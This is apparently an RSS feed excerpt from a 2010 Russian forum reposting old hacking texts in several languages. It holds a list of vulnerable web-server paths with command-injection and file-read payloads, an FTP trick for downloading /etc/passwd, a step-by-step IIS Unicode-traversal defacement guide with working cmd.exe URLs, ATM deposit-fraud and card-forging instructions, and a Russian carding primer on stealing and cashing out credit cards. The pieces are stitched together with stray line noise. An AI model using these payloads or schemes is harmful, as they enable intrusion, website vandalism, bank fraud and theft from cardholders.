/&gt;/secret/index.html&lt;br /&gt;/secret/index.htm&lt;br /&gt;/cgi-bin/phf&lt;br /&gt;/cgi-bin/commander.pl&lt;br /&gt;/cgi-bin/Count.cgi&lt;br /&gt;/cgi-bin/test.pl&lt;br /&gt;/cgi-bin/printenv&lt;br /&gt;/cgi-bin/test.cgi&lt;br /&gt;/cgi-bin/test-cgi&lt;br /&gt;/cgi-bin/nph-test-cgi&lt;br /&gt;/cgi-bin/php.cgi&lt;br /&gt;/cgi-bin/handler&lt;br /&gt;/cgi-bin/webgais&lt;br /&gt;/cgi-bin/websendmail&lt;br /&gt;/cgi-bin/webdist.cgi&lt;br /&gt;/cgi-bin/faxsurvey&lt;br /&gt;/cgi-bin/htmlscript&lt;br /&gt;/cgi-bin/pfdisplay&lt;br /&gt;/cgi-bin/perl.exe&lt;br /&gt;/cgi-bin/perl&lt;br /&gt;/perl&lt;br /&gt;/scripts/perl.exe&lt;br /&gt;/wwwboard/wwwboard.pl&lt;br /&gt;/cgi-bin/wwwboard.pl&lt;br /&gt;/wwwboard/wwwadmin.pl&lt;br /&gt;/cgi-bin/wwwadmin.pl&lt;br /&gt;/wwwboard/wwwadmin.cgi&lt;br /&gt;/cgi-bin/wwwadmin.cgi&lt;br /&gt;/cgi-bin/jj&lt;br /&gt;/cgi-bin/fi&lt;br /&gt;/cgi-bin/finger&lt;br /&gt;/cgi-bin/finger.cgi?action=archives&amp;amp;cmd=specific&amp;amp;&amp;amp;filename=99.10.28.15.23.username.|/bin/ls|&lt;br /&gt;/cgi-bin/wais.pl&lt;br /&gt;/cgi-bin/edit.pl&lt;br /&gt;/cgi-bin/textcounter.pl&lt;br /&gt;/cgi-bin/info2www&lt;br /&gt;/cgi-bin/cachemgr.cgi&lt;br /&gt;/cgi-bin/wguest.exe&lt;br /&gt;/scripts/wguest.exe&lt;br /&gt;/cgi-bin/test.exe&lt;br /&gt;/scripts/test.exe&lt;br /&gt;/cgi-bin/test.bat&lt;br /&gt;/scripts/test.bat&lt;br /&gt;/cgi-bin/www-sql&lt;br /&gt;/cgi-bin/search.cgi%3fletter=&lt;br /&gt;/cgi-bin/campas&lt;br /&gt;/cgi-bin/view-source&lt;br /&gt;/cgi-bin/webgais&lt;br /&gt;/cgi-bin/aglimpse&lt;br /&gt;/cgi-bin/wrap&lt;br /&gt;/cgi-bin/cgiwrap&lt;br /&gt;/cgi-bin/AnyForm2&lt;br /&gt;/cgi-bin/infogate&lt;br /&gt;/search97/s97_cgi.exe&lt;br /&gt;/search97/search97.vts&lt;br /&gt;/cgi-bin/dumpenv.pl&lt;br /&gt;/session/adminlogin?RCpage=/sysadmin/index.stm&lt;br /&gt;/cgi-bin&lt;br /&gt;/cgi-shl&lt;br /&gt;/scripts&lt;br /&gt;/scripts/bdir.htr&lt;br /&gt;/scripts/convert.bas&lt;br /&gt;/scripts/files.pl&lt;br /&gt;/cgi-bin/files.pl&lt;br /&gt;/domcfg.nsf/%3fopen&lt;br /&gt;/domcfg.nsf/URLRedirect/%3fOpenForm&lt;br /&gt;/domcfg.nsf/viewname%3fSearchView&amp;amp;Query=&amp;quot;*&amp;quot;&lt;br /&gt;/log.nsf&lt;br /&gt;/domlog.nsf&lt;br /&gt;/names.nsf&lt;br /&gt;/catalog.nsf&lt;br /&gt;/database.nsf?EditDocument&lt;br /&gt;/names.nsf/Open&lt;br /&gt;/cgi-bin/unlg1.1&lt;br /&gt;/cgi-bin/man.sh&lt;br /&gt;/cgi-bin/AT-admin.cgi&lt;br /&gt;/cgi-bin/filemail.pl&lt;br /&gt;/cgi-bin/mailform.pl&lt;br /&gt;/cgi-bin/mailto.cgi&lt;br /&gt;/cgi-bin/mailform.cgi&lt;br /&gt;/cgi-bin/maillist.pl&lt;br /&gt;/cgi-bin/formto.pl&lt;br /&gt;/cgi-bin/bnbform.cgi&lt;br /&gt;/cgi-bin/bnbform.pl&lt;br /&gt;/cgi-bin/bnbform&lt;br /&gt;/cgi-bin/survey.cgi&lt;br /&gt;/htbin/postform?h_mailto=swoopme%40hotmail.com&amp;amp;h_reply-file=../../../../../../../etc/hosts&lt;br /&gt;/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&amp;amp;h_reply-file=../../../../../../../etc/hosts&lt;br /&gt;/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&amp;amp;h_reply-file=|ls|&lt;br /&gt;/cgi-bin/textcounter.pl&lt;br /&gt;/cgi-bin/classifieds.cgi&lt;br /&gt;/cgi-bin/environ.cgi&lt;br /&gt;/cgi-bin/environ.pl&lt;br /&gt;/cgi-dos/args.bat&lt;br /&gt;/cgi-bin/carbo.dll&lt;br /&gt;/cgi-bin/fpexplore.exe&lt;br /&gt;/cfdocs/expeval/exprcalc.cfm&lt;br /&gt;/cfdocs/expeval/sendmail.cfm&lt;br /&gt;/cfdocs/expeval/eval.cfm&lt;br /&gt;/cfdocs/expeval/openfile.cfm&lt;br /&gt;/cfdocs/expeval/displayopenedfile.cfm&lt;br /&gt;/cfdocs/exampleapp/email/getfile.cfm&lt;br /&gt;/cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&amp;amp;FST=Plain&amp;amp;FilePath=C:\boot.ini&lt;br /&gt;/cfdocs/exampleapp/publish/admin/addcontent.cfm&lt;br /&gt;/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=&lt;br /&gt;/cfdocs/snippets/evaluate.cfm&lt;br /&gt;/cfdocs/snippets/fileexists.cfm&lt;br /&gt;/cfdocs/snippets/viewexample.cfm?Tagname=&lt;br /&gt;/cfdocs/cfmlsyntaxcheck.cfm&lt;br /&gt;/cfdocs/snippets/setlocale.cfm&lt;br /&gt;/cgi-bin/whois_raw.cgi&lt;br /&gt;/cgi-bin/query%3f&lt;br /&gt;:9000/cgi-bin/query%3f&lt;br /&gt;/cgi-bin/admin.cgi&lt;br /&gt;/cgi-bin/ppdscgi.exe&lt;br /&gt;/ppwb/Temp/&lt;br /&gt;/_private/form_results.txt&lt;br /&gt;/_private/register.htm&lt;br /&gt;/_private/register.txt&lt;br /&gt;/_private/registrations.htm&lt;br /&gt;/_private/registrations.txt&lt;br /&gt;/_vti_bin/&lt;br /&gt;/_vti_bin/_vti_adm&lt;br /&gt;/_vti_bin/_vti_adm/admin.dll &lt;br /&gt;/_vti_bin/_vti_aut&lt;br /&gt;/_vti_bin/_vti_aut/author.dll&lt;br /&gt;/_vti_bin/_vti_aut/author.exe&lt;br /&gt;/_vti_bin/_vti_aut/dvwssr.dll&lt;br /&gt;/_vti_bin/shtml.dll&lt;br /&gt;/_vti_bin/shtml.exe&lt;br /&gt;/_vti_inf.html&lt;br /&gt;/_vti_pvt/access.cnf&lt;br /&gt;/_vti_pvt/admin.pwd&lt;br /&gt;/_vti_pvt/administrators.pwd&lt;br /&gt;/_vti_pvt/authors.pwd&lt;br /&gt;/_vti_pvt/service.cnf&lt;br /&gt;/_vti_pvt/service.pwd&lt;br /&gt;/_vti_pvt/service.stp&lt;br /&gt;/_vti_pvt/services.cnf&lt;br /&gt;/_vti_pvt/shtml.dll&lt;br /&gt;/_vti_pvt/shtml.exe&lt;br /&gt;/_vti_pvt/svcacl.cnf&lt;br /&gt;/_vti_pvt/users.pwd&lt;br /&gt;/_vti_pvt/writeto.cnf&lt;br /&gt;/_vti_pwd/administrators.pwd&lt;br /&gt;/~root&lt;br /&gt;/admcgi/contents.htm&lt;br /&gt;/admin.php3&lt;br /&gt;/adminlogin?RCpage=/sysadmin/index.stm&lt;br /&gt;/admisapi/fpadmin.htm&lt;br /&gt;/adsamples/config/site.csc&lt;br /&gt;/AdvWorks/equipment/catalog_type.asp&lt;br /&gt;/Album/&lt;br /&gt;/ASPSamp/AdvWorks/equipment/catalog_type.asp&lt;br /&gt;/aux&lt;br /&gt;/bb-dnbd/bb-hist.sh&lt;br /&gt;/carbo.dll&lt;br /&gt;/catalog.nsf&lt;br /&gt;/cfappman/index.cfm&lt;br /&gt;/cfdocs/cfmlsyntaxcheck.cfm&lt;br /&gt;/cfdocs/exampleapp/docs/sourcewindow.cfm&lt;br /&gt;/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini&lt;br /&gt;/cfdocs/exampleapp/publish/admin/addcontent.cfm&lt;br /&gt;/cfdocs/exampleapp/publish/admin/application.cfm1/cfdocs/exampleapp/email/application.cfm&lt;br /&gt;/cfdocs/examples/cvbeans/beaninfo.cfm&lt;br /&gt;/cfdocs/examples/mainframeset.cfm&lt;br /&gt;/cfdocs/examples/parks/detail.cfm&lt;br /&gt;/cfdocs/expelval/displayopenedfile.cfm&lt;br /&gt;/cfdocs/expelval/exprcalc.cfm&lt;br /&gt;/cfdocs/expelval/openfile.cfm&lt;br /&gt;/cfdocs/expelval/sendmail.cfm&lt;br /&gt;/cfdocs/expeval/eval.cfm&lt;br /&gt;/cfdocs/expressions.cfm&lt;br /&gt;/cfdocs/root.cfm&lt;br /&gt;/cfdocs/snippets/evaluate.cfm&lt;br /&gt;/cfdocs/snippets/fileexist.cfm&lt;br /&gt;/cfdocs/snippets/fileexists.cfm&lt;br /&gt;/cfdocs/snippets/gettempdirectory.cfm&lt;br /&gt;/cfdocs/snippets/viewexample.cfm&lt;br /&gt;/cfdocs/zero.cfm&lt;br /&gt;/CFIDE/Administrator/startstop.html&lt;br /&gt;/cfusion/cfapps/forums/data/forums.mdb&lt;br /&gt;/cfusion/cfapps/forums/forums_.mdb&lt;br /&gt;/cfusion/cfapps/security/data/realm.mdb&lt;br /&gt;/cfusion/cfapps/security/realm_.mdb&lt;br /&gt;/cfusion/database/cfexamples.mdb&lt;br /&gt;/cfusion/database/cfsnippets.mdb&lt;br /&gt;/cfusion/database/cypress.mdb&lt;br /&gt;/cfusion/database/smpolicy.mdb&lt;br /&gt;/cgi-bin/&lt;br /&gt;/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi&lt;br /&gt;/cgi-bin/.fhp&lt;br /&gt;/cgi-bin/add_ftp.cgi&lt;br /&gt;/cgi-bin/aglimpse&lt;br /&gt;/cgi-bin/alibaba.pl&lt;br /&gt;/cgi-bin/AnForm2&lt;br /&gt;/cgi-bin/AnyBoard.cgi&lt;br /&gt;/cgi-bin/AnyForm2&lt;br /&gt;/cgi-bin/apexec.pl&lt;br /&gt;/cgi-bin/archie&lt;br /&gt;/cgi-bin/architext_query.cgi&lt;br /&gt;/cgi-bin/AT-admin.cgi&lt;br /&gt;/cgi-bin/AT-generate.cgi&lt;br /&gt;/cgi-bin/ax.cgi&lt;br /&gt;/cgi-bin/ax-admin.cgi&lt;br /&gt;/cgi-bin/axs.cgi&lt;br /&gt;/cgi-bin/bb-hist.sh&lt;br /&gt;/cgi-bin/bigconf.cgi&lt;br /&gt;/cgi-bin/bizdb1-search.cgi&lt;br /&gt;/cgi-bin/bnbform.cgi&lt;br /&gt;/cgi-bin/c_download.cgi&lt;br /&gt;/cgi-bin/cachemgr.cgi&lt;br /&gt;/cgi-bin/calendar&lt;br /&gt;/cgi-bin/campas&lt;br /&gt;/cgi-bin/cart.pl&lt;br /&gt;/cgi-bin/cgiback.cgi&lt;br /&gt;/cgi-bin/cgi-lib.pl&lt;br /&gt;/cgi-bin/cgitest.exe&lt;br /&gt;/cgi-bin/cgiwrap&lt;br /&gt;/cgi-bin/classified.cgi&lt;br /&gt;/scripts/cart32.exe&lt;br /&gt;/scripts/cart32.exe/cart32clientlist&lt;br /&gt;/scripts/CGImail.exe&lt;br /&gt;/scripts/convert.bas&lt;br /&gt;/scripts/counter.exe&lt;br /&gt;/scripts/cpshost.dll&lt;br /&gt;/scripts/Fpadmcgi.exe&lt;br /&gt;/scripts/fpcount.exe&lt;br /&gt;/scripts/iisadmin/default.htm&lt;br /&gt;/scripts/iisadmin/ism.dll&lt;br /&gt;/scripts/iisadmin/samples/ctgestb.htx&lt;br /&gt;/scripts/iisadmin/samples/ctgestb.idc&lt;br /&gt;/scripts/iisadmin/samples/details.htx&lt;br /&gt;/scripts/iisadmin/samples/details.idc&lt;br /&gt;/scripts/iisadmin/samples/query.htx&lt;br /&gt;/scripts/iisadmin/samples/query.idc&lt;br /&gt;/scripts/iisadmin/samples/register.htx&lt;br /&gt;/scripts/iisadmin/samples/register.idc&lt;br /&gt;/scripts/iisadmin/samples/sample.htx&lt;br /&gt;/scripts/iisadmin/samples/sample.idc&lt;br /&gt;/scripts/iisadmin/samples/sample2.htx&lt;br /&gt;/scripts/iisadmin/samples/viewbook.htx&lt;br /&gt;/scripts/iisadmin/samples/viewbook.idc&lt;br /&gt;/scripts/iisadmin/tools/ct.htx&lt;br /&gt;/scripts/iisadmin/tools/ctss.idc&lt;br /&gt;/scripts/iisadmin/tools/dsnform.exe&lt;br /&gt;/session/adminlogin?RCpage=/sysadmin/index.stm&lt;br /&gt;/session/admnlogin&lt;/p&gt;
						&lt;p&gt;--------------------------------THE END-----------------------------&lt;/p&gt;
						&lt;p&gt;Hacking Shell Melalui Ftp :&lt;/p&gt;
						&lt;p&gt;Hacking shell melalui FTP&lt;br /&gt;Berikut ini adalah cara menghack menggunakan Windows, yang digunakan untuk mendapatkan password file dari sebuah shell.Cara ini menggunakan ftp protocol.Kebanyakan paswordnya id sembunyikan /shadowed, tapi kamu masih bisa mendapatkannya dg meng-finger atau menebak passwordnya untuk loginnya.&lt;br /&gt;Kamu dapat memulainya dg membuka/memasuki sebuah shell, dan kamu tidak perlu/tidak harus menggunakan/ berada didalam sebuah ftp server.berikut langkah langkahnya :&lt;br /&gt;1.jalankan prompt&lt;br /&gt;2.Tuliskan command untuk membuka dos command prompt&lt;br /&gt;3.tuliskan ftp server.to.hack.com (nama servernya!!)&lt;br /&gt;4.Akan muncul prompt login.. tekan enter saja (tidak perlu menuliskan apa apa)&lt;br /&gt;5.Akan muncul password login.. tekan saja enter...&lt;br /&gt;6.sekarang ketiklah &amp;quot;quote user ftp&amp;quot; dan tekan enter&lt;br /&gt;7.lalu ketik &amp;quot;quote cwd ~root&amp;quot; tekan enter&lt;br /&gt;8.dan ketikan &amp;quot;quote pass ftp&amp;quot; tekan enter&lt;br /&gt;Sekarang kamu sudah memiliki guest access dan dapat mendownload password file.. and have a fuckin&#039; shit with that&lt;br /&gt;9.ketiklah &amp;quot;cd etc&amp;quot; tekan enter.. untuk mendapatkan -etc directory- yg berisi file password&lt;br /&gt;10.ketiklah &amp;quot;get passwd&amp;quot; untuk mendownload passw.file ke HD mu&lt;/p&gt;
						&lt;p&gt;Sekarang kamu suda memiliki password file dan kamu dapat membukanya di C:\passwd dengan menggunakan notepad&lt;br /&gt;Jika file tersebut di enkripsi.. kamu bisa meng-crackernya.. dan jika tidak dienkripsi.. (You lucky) kamu dapat mencocokan antara user login dg passwordnya....&lt;/p&gt;
						&lt;p&gt;DEFACE &amp;amp; HACKING SHELL&lt;br /&gt;1.Deface&lt;br /&gt;Langkah 1 : Cari target&lt;br /&gt;Mencari target dapat dilakukan dengan berbagai cara hal ini tergantung kreativitas dan sarana yang dimiliki, dalam hal ini bisa berbentuk script IRC, scanner. Untuk basicnya mengetahui OS yang digunakan server suatu site dapat diketahui dengan menggunakan site&lt;a href=&quot;http://www.netcraft.com&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.netcraft.com&lt;/a&gt;./ juga dapat dilakukan di search engine pada&lt;a href=&quot;http://www.yahoo.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.yahoo.com/&lt;/a&gt;dengan menggunakan words .default.asp&lt;br /&gt;Langkah 2 : Unicode&lt;br /&gt;Setelah target didapat maka digunakan unicode. Unicode itu sendiri penulis juga belum tahu secara mendetail, tapi pada dasarnya unicode menggunakan bahasa ASCII.Server yg menggunakan OS NT dengan IIS sendiri mempunyai bug yang bisa ditembus dengan unicode dalam hal ini bila server itu belum dipatch. Unicode yg berhasil ditemukan untuk memasuki server NT sudah banyak. dan yang bisa dicoba sbb:&lt;br /&gt;http://target-loe/_vti_bin/..&amp;#192;&amp;#175;../..&amp;#192;&amp;#175;../..&amp;#192;&amp;#175;../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;http://target-loe/scripts/..&amp;#192;&amp;#175;../..&amp;#192;&amp;#175;../..&amp;#192;&amp;#175;../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;http://target-loe/msdac/..&amp;#192;&amp;#175;../..&amp;#192;&amp;#175;../..&amp;#192;&amp;#175;../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;http://target-loe/cgi-bin/..&amp;#192;&amp;#175;../..&amp;#192;&amp;#175;../..&amp;#192;&amp;#175;../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;http://target-loe/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;bila unicode tsb berhasil maka akan dapat dilihat tampilan seperti berikut:&lt;br /&gt;Directory of c:\ &lt;br /&gt;06/03/01 09:59a (DIR) InetPub&lt;br /&gt;08/08/01 06:14p (DIR) WINNT &lt;br /&gt;Langkah 3 :cari file index.htm&lt;br /&gt;Saat membuka browser site tsb pada ie kita melihat tampilan muka site tsb, perlu diperhatikan adalah file tampilan tsb link menuju file apa? biasanya antara lain :index.htm, index.html, default.htm, default.html. Kemudian dengan mengunakan unicode tsb kita mencari file tsb letaknya dimana, biasanya di c:\inetpub\wwwroot (hal ini belum tentu). untuk mencari file dapat digunakan perintah :&lt;br /&gt;/c+dir/s+c:\index.htm&lt;br /&gt;hal ini berarti perintah mencari file index.htm di dalam drive c&lt;br /&gt;untuk mencek apakah file index.htm tsb yg dipergunakan pada tampilan site, dipergunakan perintah :&lt;br /&gt;/c+type+c:\direktory dan nama file, contoh : /c+type+c:\inetpub\wwwroot\index.htm&lt;br /&gt;setelah anda menemukan file index.htm tsb, maka sebaiknya anda copy dulu, hal ini agar tindakan deface kita tidak terlalu merugikan admin server site tsb.sehingga admin tsb mempunyai backup file index.&lt;br /&gt;perintah copy itu sendiri adalah:&lt;br /&gt;/c+copy+c:\&lt;br /&gt;contoh untuk pencopyan adalah :/c+copy+c:\inetpub\wwwroot\index.htm backupindex.htm&lt;br /&gt;untuk mempermudah pekerjaan dapat dilakukan pencopyan file cmd.exe yg berada di direktory c:/winnt/system32 dengan menggunakan nama anda, seperti :&lt;br /&gt;/c+copy+c:\winnt\system32\cmd.exe+c:\deface.exe&lt;br /&gt;hal ini berarti anda mencopy file cmd.exe ke dir c dgn nama deface.exe, sehingga untuk perintah2 selanjutnya tidak memerlukan /winnt/system32/cmd.exe?/ tapi cukup /deface.exe?/&lt;br /&gt;Langkah 4 : echo file index.htm&lt;br /&gt;echo dalam dos berarti anda membuat file maka bila file index.htm yg asli anda echo berarti anda timpa dengan file index anda. untuk perintahnya adalah:&lt;br /&gt;/deface.exe?/c+echo+&amp;quot;deface+was+here&amp;quot;+&amp;gt;+c:\inetpub\wwwroot\index.htm &lt;br /&gt;sehingga tampilan site depan telah terganti dengan tulisan &lt;br /&gt;deface was here&lt;br /&gt;catatan: hal ini berlaku bila file index.htm tsb dapat diecho, krn sebagian server membatasi direktory root dgn read only, sehingga perintah echo index.htm akan menghasilkan :&lt;br /&gt;acces denied&lt;br /&gt;untuk membuat deface anda menjadi lebih bagus, dapat digunakan bahasa html dan ASCII&lt;br /&gt;perintah-perintah lain :&lt;br /&gt;membuat direktory = /c+mkdir+c:\&lt;br /&gt;merubah nama file = /c+ren+c:\file&lt;br /&gt;menghapus file = /c+del+c:\file&lt;/p&gt;
						&lt;p&gt;--------------------------------THE END--------------------------------&lt;/p&gt;
						&lt;p&gt;Hacking ATM &lt;/p&gt;
						&lt;p&gt;Trick 1&lt;/p&gt;
						&lt;p&gt;Preface:&lt;br /&gt;-------&lt;br /&gt;ATM&#039;s are nothing new, banks have been using them for years,&lt;br /&gt;and now you see them being used more than ever, and are becoming&lt;br /&gt;more and more widespread. This, of course, just opens up more&lt;br /&gt;ways to make money, and I am again bringing you another safe and&lt;br /&gt;proven technique of improving your cash flow.&lt;/p&gt;
						&lt;p&gt;Banks:&lt;br /&gt;-----&lt;br /&gt;As mentioned, almost all banks nowadays have ATM machines.&lt;br /&gt;Grab the local phone book and start calling banks. What you want&lt;br /&gt;to know is &amp;quot;What is the most I can take out of an ATM machine right&lt;br /&gt;after I deposit a check?&amp;quot; Most banks range anywhere from $50 to&lt;br /&gt;$1000. This is for when you make a deposit via the ATM, and then&lt;br /&gt;right away make a withdraw against the funds on the check, even&lt;br /&gt;though the check hasn&#039;t been verified. I&#039;m sure you can see what&#039;s&lt;br /&gt;coming.&lt;/p&gt;
						&lt;p&gt;Account:&lt;br /&gt;-------&lt;br /&gt;Open a savings account at the bank that offers the highest&lt;br /&gt;amount of ATM withdraw. Use a fake name (of course) and apply for&lt;br /&gt;the ATM card too. You might even tell them that you need the ATM&lt;br /&gt;card because you work odd hours, so it is difficult for you to get&lt;br /&gt;to the banks when they are open.&lt;/p&gt;
						&lt;p&gt;Deposit:&lt;br /&gt;-------&lt;br /&gt;Soon you will get your ATM card in the mail, and it should be&lt;br /&gt;sent to your mailing address that would be a lot like a drop for&lt;br /&gt;carding. You should be able to figure out how to do that. Take&lt;br /&gt;your ATM card and go to the banks ATM machine. Select DEPOSIT&lt;br /&gt;and when it asks for amout, type in $999.00. DO NOT deposit an&lt;br /&gt;amount OVER $1000! This is important because then the check will&lt;br /&gt;have to wait for bank clearance, which means that you&#039;ll be screwed.&lt;br /&gt;When it&#039;s time to insert the deposit into the slot on the ATM, insert&lt;br /&gt;an empty envelope. For all the ATM knows, this was just a check for&lt;br /&gt;$999.00, and now places your account ledger at $999.00. Now you are&lt;br /&gt;free to withdraw up to the full $1000 that you are allowed. Since&lt;br /&gt;you never really put in any money, this is all free money coming out!&lt;/p&gt;
						&lt;p&gt;I&#039;ve done this myself and got $950 out of a machine. It was a HUGE&lt;br /&gt;stack of twenties! Just be on the watch for cameras!&lt;/p&gt;
						&lt;p&gt;Have fun.&lt;/p&gt;
						&lt;p&gt;Trick 2&lt;/p&gt;
						&lt;p&gt;Have you ever looked longingly upon the sight of your local PULSE machine&lt;br /&gt;and thought, &amp;quot;There must be some way that I can make some money REAL easy&lt;br /&gt;here.&amp;quot;?&lt;/p&gt;
						&lt;p&gt;Well, there is. But it won&#039;t be easy. Protection methods can be overcome,&lt;br /&gt;but the technology involved must be understood IN ITS ENTIRETY before an&lt;br /&gt;[PAUSE] attempt at illegal access is to be made. There are hundreds of pe&lt;br /&gt;ople,&lt;br /&gt;guests of the state, that figured their plans infallible, only to fall&lt;br /&gt;victim to a well-hidden camera.&lt;/p&gt;
						&lt;p&gt;This article will not be a lesson on HOW to break into the machine, it is&lt;br /&gt;merely a summary of the operations involved with a normal ATM transaction.&lt;br /&gt;This information is being presented on a &amp;quot;for information&#039;s sake&amp;quot;-only&lt;br /&gt;basis. I, Count Zero, do not promote nor remotely condone any illegal&lt;br /&gt;acts of any sort. So there.&lt;/p&gt;
						&lt;p&gt;I. MAGNETIC STRIP FORMAT&lt;/p&gt;
						&lt;p&gt;This would seem to be the most efficient method of trying to access illegal&lt;br /&gt;sums of cash. You could:&lt;/p&gt;
						&lt;p&gt;a. steal somebody&#039;s card and PIN code&lt;br /&gt;b. synthesize a card&lt;br /&gt;c. attempt to &amp;quot;jackpot&amp;quot; the system&lt;/p&gt;
						&lt;p&gt;We will only look at option B. As &amp;quot;A&amp;quot; is up to your own devices and &amp;quot;C&amp;quot; has&lt;br /&gt;several good text files written about it already. So &amp;quot;B&amp;quot; it is.&lt;/p&gt;
						&lt;p&gt;[PAUSE] Let&#039;s look at the format of the data written to the magnetic strip&lt;br /&gt;s. This&lt;br /&gt;has been taken from a recent HARTWELL, INC manual.&lt;/p&gt;
						&lt;p&gt;[ XX XX XX XX XX XX XX XX ] [ YYYY ] [ - 20 CHARS - ] [ ZZ ZZ ZZ ] [ CC CC ]&lt;br /&gt;\-----------------------/ \------/ \--------------/ \----------/ \-------/&lt;br /&gt;Your individual acct. PIN Name of card Bank route CHKSUM&lt;br /&gt;number/serial code Code issuee code/rem.&lt;/p&gt;
						&lt;p&gt;-gwy 03133-ITT: call reset (c 0,d 85): dte originated&lt;br /&gt;,Q) : &lt;/p&gt;
						&lt;p&gt;N I Z A T I O N P R E S E N T S&lt;/p&gt;
						&lt;p&gt;XXXXXXXXXXXXXXXXXXXXXXXX&lt;br /&gt;XX XXXX XXXX XXXX XX&lt;br /&gt;XXX XX XXXXXX XX XXX&lt;br /&gt;XXXX XXXXXXXX XXXX&lt;br /&gt;XXX XX XXXXXX XX XXX&lt;br /&gt;XX XXXX XXXX XXXX XX&lt;br /&gt;XXXXXXXXXXXXXXXXXXXXXXXX&lt;/p&gt;
						&lt;p&gt;&amp;quot;HOW TO LOGIN TO A C.B.I. SYSTEM&amp;quot;&lt;/p&gt;
						&lt;p&gt;WRITTEN BY: L.E. PIRATE&lt;/p&gt;
						&lt;p&gt;THANKS TO: ZANGIN&lt;/p&gt;
						&lt;p&gt;The following is the login procedure to login to a C.B.I. system,&lt;br /&gt;a few C.B.I. login port numbers, information on the system, and obtain C.B.I.&lt;br /&gt;accounts.&lt;/p&gt;
						&lt;p&gt;*** HOW TO GET CBI INFORMATION ***&lt;/p&gt;
						&lt;p&gt;Ok, you can get CBI accounts and CBI printouts at your local mall.&lt;br /&gt;The best places to check are: Insurance Places, Lawyers, Doctors, and Car&lt;br /&gt;Dealerships, and check some places in the mall that might have to check a &lt;br /&gt;person&#039;s credit. Trash in their dumpster looking for printouts. Most places&lt;br /&gt;buffer capture their whole call to CBI including the number, everything on&lt;br /&gt;buffer, it&#039;s better than christmas. Ok, so look obtain these CBI printouts&lt;br /&gt;and cruise home to the old computer.&lt;br /&gt;-----------------------------------------------&lt;/p&gt;
						&lt;p&gt;enjoy,&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Kasper)</author>
			<pubDate>Thu, 07 Jan 2010 18:27:02 +0300</pubDate>
			<guid>https://kasper.7li.ru/viewtopic.php?pid=27#p27</guid>
		</item>
		<item>
			<title>Введение в кардинг</title>
			<link>https://kasper.7li.ru/viewtopic.php?pid=26#p26</link>
			<description>&lt;p&gt;Добрый вечер дамы и господа! Сегодня у нас на повестке дня кардинг.&lt;br /&gt;Наверное, многие из вас догадываются, что это такое (ну а для тех,&lt;br /&gt;кто не знает, прошу - моя первая статья) Итак, что же это за зверь,&lt;br /&gt;с помощью которого можно стать или очень богатым или огрести таких&lt;br /&gt;пиздюлей, что мало не покажется!!!&lt;br /&gt;Во первых кардинг - уголовно наказуемое преступление, хотя конечно&lt;br /&gt;же не тоже что и вооруженное ограбление, но всё же это преступление.&lt;br /&gt;Но это обратная сторона медали, а теперь давайте рассмотрим ту самую,&lt;br /&gt;из-за которой так много людей хотят заниматься этим. Имея данные о&lt;br /&gt;карте и о владельце, можно эту карту продать другим кардерам, а можно&lt;br /&gt;завалиться в онлайн магазин и скупить там всё под чистую, хотя последнее&lt;br /&gt;весьма не рекомендуется, так как могут прийти люди в кирзовых сапогах =) .&lt;br /&gt;Разберем теперь систему функционирования кредиток. Они появились давно,&lt;br /&gt;и по идее должны были стать удобным средством расчета, которое трудно&lt;br /&gt;украсть(!) и нелегально использовать(!). На каждую карту нанесен&lt;br /&gt;16значный номер ФИО владельца Exp.data(типа срока годности =) и ещё у&lt;br /&gt;каждой карты есть пин код. Поэтому использовать их в реальной жизни&lt;br /&gt;очень трудно (владелец при малейшем подозрении просто позвонит в банк&lt;br /&gt;и заблокирует счёт). Есть дохрена различных типов карт, которые выдаются&lt;br /&gt;банком эмитентом (этим мудреным словом зовется банк, выдавший карту).&lt;br /&gt;Основными являются = MasterCard, Eurocard, Visa и пр. пр. пр.&lt;br /&gt;Разберем теперь способы получения этих заветных карт :&lt;br /&gt;1. самый популярный способ, это сделать фейковый (поддельный) магазин,&lt;br /&gt;торгующий через интернет, или порно сайт, оплата в них будет вестись,&lt;br /&gt;конечно же, кредитками.&lt;br /&gt;Если его правильно разрекламировать, то можно получить&lt;br /&gt;постоянный приток новеньких кредиток!&lt;br /&gt;2. Можно попытаться взломать какой-нибудь интернет магазин, но для этого&lt;br /&gt;надо быть хорошим взломщиком (по-моему, сейчас инет магазинам запретили&lt;br /&gt;хранить у себя данные о карте, и о владельце)&lt;br /&gt;3. Бывает, что на сайтах кардерской тематики выкладывается списки с&lt;br /&gt;кредитками, которыми можно воспользоваться на халяву, минус у этого&lt;br /&gt;способа в том, что такие карты быстро становятся не валидными!&lt;br /&gt;4. Этот способ популярен у новичков, он заключается в том, чтобы&lt;br /&gt;просто купить карту, благо сайтов торгующих ими развелось, как …&lt;br /&gt;5. Ну и на конец, их можно стрейдить (поменять на че-нить ценное) у&lt;br /&gt;других кардеров&lt;br /&gt;Не думайте, что в этой статье приведены все способы по добыче cc(credit card)&lt;br /&gt;Есть ещё такие извращенные, как trashing (от англ. рытьё в мусоре&lt;br /&gt;Часто компании имеющие дело с кредитными картами, выбрасывают в мусор&lt;br /&gt;документы, в которых содержаться данные о карте и о владельце,&lt;br /&gt;наша задача в этом случае найти, куда этот мусор вывозят,&lt;br /&gt;порыться в нем и получить таки cc) или социальная инжинерия.&lt;br /&gt;А что же дальше спросишь ты, что мне делать с этими кредитками?&lt;br /&gt;Ну, конечно же, ты можешь оплатить доступ к платному порносайту,&lt;br /&gt;зарегистрировать прогу, которая вечно требует денег и орет про&lt;br /&gt;оставшиеся 30 дней.&lt;br /&gt;Но самым правильным способом является обналичка денег с кредитки,&lt;br /&gt;через пайпал(платежная система), мерчант и тд. Об этом я расскажу&lt;br /&gt;позднее.&lt;br /&gt;Лирическое отступление = &lt;br /&gt;Кардинг набирает обороты не только у нас в стране, но и&lt;br /&gt;по всему миру. Цены на карточки 